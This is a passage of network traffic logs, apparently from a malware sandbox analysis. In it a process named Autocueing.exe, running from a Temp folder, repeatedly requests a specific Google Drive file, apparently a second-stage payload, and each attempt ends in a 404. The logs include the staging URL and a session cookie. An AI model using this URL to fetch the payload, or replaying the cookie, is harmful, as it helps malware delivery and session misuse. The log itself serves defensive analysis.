                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:10 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:09 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-IL9m1ThhpXKq1MAOKmRrwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.6 | 50045 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:10 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:11 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTEoM0Zwsy96yCugUnNJBzM1_93b667AySGCPw-K_b46LDOJjRqw465ETxjN2Y4uEyMvJZ0B3Y
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:10 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-eMts4lZsweDBfob4_ZZZcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:29:11 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zfmSapITf9WNWxib38aCdg">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.6 | 50046 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:11 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:12 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:12 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-fuy7EvnSyNCH7ZnNVBbd3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.6 | 50047 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:12 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:13 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgSG5Bk7FTZ75QWEBZELc6PAOLgrTzaxhHGFUHVdiMc_xsWtotTyXJVK-EHq7r9bcReU7dxotPg
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:13 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-MKNts7zkqtLaJ_EuFWQjTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="W4WzQB3uQyHcW0dGN0vrfQ">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.6 | 50048 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:14 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:14 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:14 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-GF4t2KQpD7qgc_E0U9gqMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.6 | 50049 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:15 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:15 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgTCGPqfiCIfF7E4_Y11Zlpi8lHpDbTMaEzto-slDSb-3GjKD6gQan4_sQ8i1GkxpTNa
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:15 GMT
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-60rpNSTb_L5yiR1PBmRv2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="si-tfqatqOZOWHJIKac-Kg">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.6 | 50050 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:16 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:16 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:16 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-gy4agRKB4X12b50EEvjeRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.6 | 50051 | 142.250.185.129 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:17 UTC | 459 | OUT | GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
2025-01-11 04:29:17 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFIdbgR7bc2rGpMLGCJvCHpFRm5Gr70P50kJy7IVTs3cJJDbuHvRpXoBoefuvhhteLsfhrTr
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Sat, 11 Jan 2025 04:29:17 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'nonce-p8pc-WhDtEl5hMlh9Ti1nA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
2025-01-11 04:29:17 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wqGx8Y_LSAYFYMhkk5LcRg">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.6 | 50052 | 142.250.185.142 | 443 | 5140 | C:\Users\user\AppData\Local\Temp\Autocueing.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:18 UTC | 417 | OUT | GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                    Host: drive.google.com
                                                                                                                                                                                    Cache-Control: no-cache
